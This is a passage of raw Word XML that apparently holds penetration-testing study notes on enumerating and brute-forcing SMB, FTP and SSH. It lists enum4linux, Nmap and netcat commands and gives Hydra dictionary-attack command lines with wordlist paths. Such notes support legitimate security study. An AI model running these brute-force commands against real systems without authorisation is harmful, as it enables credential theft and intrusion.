          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“enum4linux -G (HOST)” – Enumerate groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6230E251" w14:textId="18800D4B" w:rsidR="002B6B79" w:rsidRPr="002A77BD" w:rsidRDefault="002B6B79" w:rsidP="00D30699">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“enum4linux -i (HOST)” – Enumerate printers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118537C9" w14:textId="0466E9CA" w:rsidR="007E515A" w:rsidRPr="002A77BD" w:rsidRDefault="007E515A" w:rsidP="00D30699">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“enum4linux -r -u (USER) -p (PASS) (HOST) – Enumerate SIDs or just general enum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF5CD08" w14:textId="77777777" w:rsidR="00D30699" w:rsidRPr="002A77BD" w:rsidRDefault="00D30699" w:rsidP="00D30699">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="357AE3F3" w14:textId="6AD8E307" w:rsidR="00D734CA" w:rsidRPr="002A77BD" w:rsidRDefault="00335A2B" w:rsidP="00D734CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Dictionary Attacks (SMB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654C0F60" w14:textId="1B7C5028" w:rsidR="00335A2B" w:rsidRPr="002A77BD" w:rsidRDefault="00335A2B" w:rsidP="00D734CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46752FCA" w14:textId="35FD4F1A" w:rsidR="00335A2B" w:rsidRPr="002A77BD" w:rsidRDefault="00335A2B" w:rsidP="00335A2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“hydra -l (SINGLE USER) -P (PASS FILE) smb://(HOST)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D9BF63" w14:textId="0A88B85B" w:rsidR="00335A2B" w:rsidRPr="002A77BD" w:rsidRDefault="00335A2B" w:rsidP="00335A2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Brute forces the SMB login for the user specified, using the password file for the attack</w:t>
      </w:r>
      <w:r w:rsidR="00036146" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5EB025" w14:textId="77777777" w:rsidR="00036146" w:rsidRPr="002A77BD" w:rsidRDefault="00036146" w:rsidP="007E515A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BE07888" w14:textId="28BB4537" w:rsidR="00F47FBD" w:rsidRPr="002A77BD" w:rsidRDefault="00F47FBD" w:rsidP="007E515A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>FTP – File Transfer Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4699873E" w14:textId="3F46E074" w:rsidR="00F47FBD" w:rsidRPr="002A77BD" w:rsidRDefault="00F47FBD" w:rsidP="00F47FBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Pretty barebones, it’s a service on Port 21 that allows for file transfer between devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A7CA55" w14:textId="71B09171" w:rsidR="00F47FBD" w:rsidRPr="002A77BD" w:rsidRDefault="00F47FBD" w:rsidP="00F47FBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>If the FTP anonymous login script does not detect anon logins, could password spray with Hydra</w:t>
      </w:r>
      <w:r w:rsidR="00753215" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B194230" w14:textId="4914AF4E" w:rsidR="00753215" w:rsidRPr="002A77BD" w:rsidRDefault="00753215" w:rsidP="00753215">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Anonymous login is a security vulnerability, its allowed by typing in “Anonymous” as the username and an empty password during the FTP login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E00CA1" w14:textId="675DF4D9" w:rsidR="00753215" w:rsidRPr="002A77BD" w:rsidRDefault="00753215" w:rsidP="00F47FBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt $IP ftp”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDC7FD9" w14:textId="77777777" w:rsidR="00753215" w:rsidRPr="002A77BD" w:rsidRDefault="00753215" w:rsidP="00753215">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C702BFE" w14:textId="55D9B01E" w:rsidR="00753215" w:rsidRPr="002A77BD" w:rsidRDefault="00753215" w:rsidP="00753215">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>FTP generally follows a similar approach to Unix command-line language.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECDB86B" w14:textId="77777777" w:rsidR="00753215" w:rsidRPr="002A77BD" w:rsidRDefault="00753215" w:rsidP="00753215">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13729BBF" w14:textId="160DADF0" w:rsidR="00753215" w:rsidRPr="002A77BD" w:rsidRDefault="00753215" w:rsidP="00753215">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“get” allows you to download a file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F04E02" w14:textId="25D6A04A" w:rsidR="00753215" w:rsidRPr="002A77BD" w:rsidRDefault="00753215" w:rsidP="00753215">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“put” allows to upload a file to the current FTP directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E868EF" w14:textId="35CFF107" w:rsidR="00753215" w:rsidRPr="002A77BD" w:rsidRDefault="00753215" w:rsidP="00753215">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“cd” to change directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7973CE" w14:textId="055E7196" w:rsidR="00753215" w:rsidRPr="002A77BD" w:rsidRDefault="00753215" w:rsidP="00753215">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“ls” to view files in current directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DA06E6" w14:textId="77777777" w:rsidR="00753215" w:rsidRPr="002A77BD" w:rsidRDefault="00753215" w:rsidP="00753215">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45403B77" w14:textId="1201E420" w:rsidR="00753215" w:rsidRPr="002A77BD" w:rsidRDefault="00753215" w:rsidP="00753215">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> FTP Brute force with NMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A5151F" w14:textId="20F9C96D" w:rsidR="00753215" w:rsidRPr="002A77BD" w:rsidRDefault="00753215" w:rsidP="00753215">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>“nmap (HOST) –script ftp-brute –scriptargs userdb=(PATH_USER_FILE) -p 21”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7896F8" w14:textId="77777777" w:rsidR="003064C5" w:rsidRPr="002A77BD" w:rsidRDefault="003064C5" w:rsidP="003064C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05562958" w14:textId="77777777" w:rsidR="003064C5" w:rsidRPr="002A77BD" w:rsidRDefault="003064C5" w:rsidP="003064C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="316A14D5" w14:textId="77777777" w:rsidR="003064C5" w:rsidRPr="002A77BD" w:rsidRDefault="003064C5" w:rsidP="003064C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4326E6BB" w14:textId="7C4B9C2A" w:rsidR="003064C5" w:rsidRPr="002A77BD" w:rsidRDefault="003064C5" w:rsidP="003064C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SSH – Secure Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AC6A0C" w14:textId="4AC5EB3B" w:rsidR="000E051D" w:rsidRPr="002A77BD" w:rsidRDefault="000E051D" w:rsidP="003064C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SSH – NMAP Scans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182045D5" w14:textId="6F0F4FFB" w:rsidR="003064C5" w:rsidRPr="002A77BD" w:rsidRDefault="003064C5" w:rsidP="003064C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Used for remote administration and allows you to interact with a remote machine over an encrypted network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CE7B97" w14:textId="27A1174E" w:rsidR="003064C5" w:rsidRPr="002A77BD" w:rsidRDefault="003064C5" w:rsidP="003064C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“ssh (USER)@(HOST)” – General SSH connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C35D160" w14:textId="761BE806" w:rsidR="003064C5" w:rsidRPr="002A77BD" w:rsidRDefault="003064C5" w:rsidP="003064C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nc (HOST) (PORT)” – Can potentially enumerate SSH version and host info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0492C3" w14:textId="7262899B" w:rsidR="003064C5" w:rsidRPr="002A77BD" w:rsidRDefault="003064C5" w:rsidP="003064C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap (HOST) -p 22 –script</w:t>
      </w:r>
      <w:r w:rsidR="007D1A77" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ssh2-enum-algos” (IF ENUM POINTS SSH VERS to SSH2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185B2C2C" w14:textId="5970DD9B" w:rsidR="003064C5" w:rsidRPr="002A77BD" w:rsidRDefault="003064C5" w:rsidP="003064C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enumerate all SSH algorithms that can be used to create the SSH key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4290251B" w14:textId="2274F079" w:rsidR="003064C5" w:rsidRPr="002A77BD" w:rsidRDefault="003064C5" w:rsidP="003064C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Useful: SSH-RSA key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356E098B" w14:textId="1D2E98ED" w:rsidR="003064C5" w:rsidRPr="002A77BD" w:rsidRDefault="003064C5" w:rsidP="003064C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap (HOST) -p 22 –script</w:t>
      </w:r>
      <w:r w:rsidR="007D1A77" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ssh-hostkey –script-args ssh_hostkey=full”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E18AF40" w14:textId="655B6417" w:rsidR="003064C5" w:rsidRPr="002A77BD" w:rsidRDefault="003064C5" w:rsidP="003064C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Displays full RSA, ECDSA, and ED25519 keys if they were applicable</w:t>
      </w:r>
      <w:r w:rsidR="00E161BA" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4959C6" w14:textId="5D72B6FE" w:rsidR="003064C5" w:rsidRPr="002A77BD" w:rsidRDefault="00E161BA" w:rsidP="003064C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap (HOST) -p 22 –script</w:t>
      </w:r>
      <w:r w:rsidR="007D1A77" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ssh-auth-methods –script-args=”ssh.user=(INPUT)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AA4BF9" w14:textId="50BF0D97" w:rsidR="00E161BA" w:rsidRPr="002A77BD" w:rsidRDefault="00E161BA" w:rsidP="00E161BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>View authentication types, the INPUT could be anything (admin, guest, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AFC61C" w14:textId="4EFF84DB" w:rsidR="00E161BA" w:rsidRPr="002A77BD" w:rsidRDefault="00E161BA" w:rsidP="00E161BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>If a user has a “none-auth” login, this will NOT prompt them to authenticate themselves to login to the SSH server (VULNERABILITY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688CA4B5" w14:textId="77777777" w:rsidR="00E161BA" w:rsidRPr="002A77BD" w:rsidRDefault="00E161BA" w:rsidP="00E161BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A311D29" w14:textId="7EA3EB96" w:rsidR="00E161BA" w:rsidRPr="002A77BD" w:rsidRDefault="00E161BA" w:rsidP="00E161BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SSH Dictionary Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DD6208" w14:textId="0898EF24" w:rsidR="00E161BA" w:rsidRPr="002A77BD" w:rsidRDefault="00E161BA" w:rsidP="00E161BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Can get around authentication potentially.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79097EE0" w14:textId="6E1ADC91" w:rsidR="00E161BA" w:rsidRPr="002A77BD" w:rsidRDefault="00E161BA" w:rsidP="00E161BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Hydra can be utilized to brute force/utilize dictionary attack for this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CE9B63" w14:textId="219C1305" w:rsidR="00E161BA" w:rsidRPr="002A77BD" w:rsidRDefault="00E161BA" w:rsidP="00E161BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
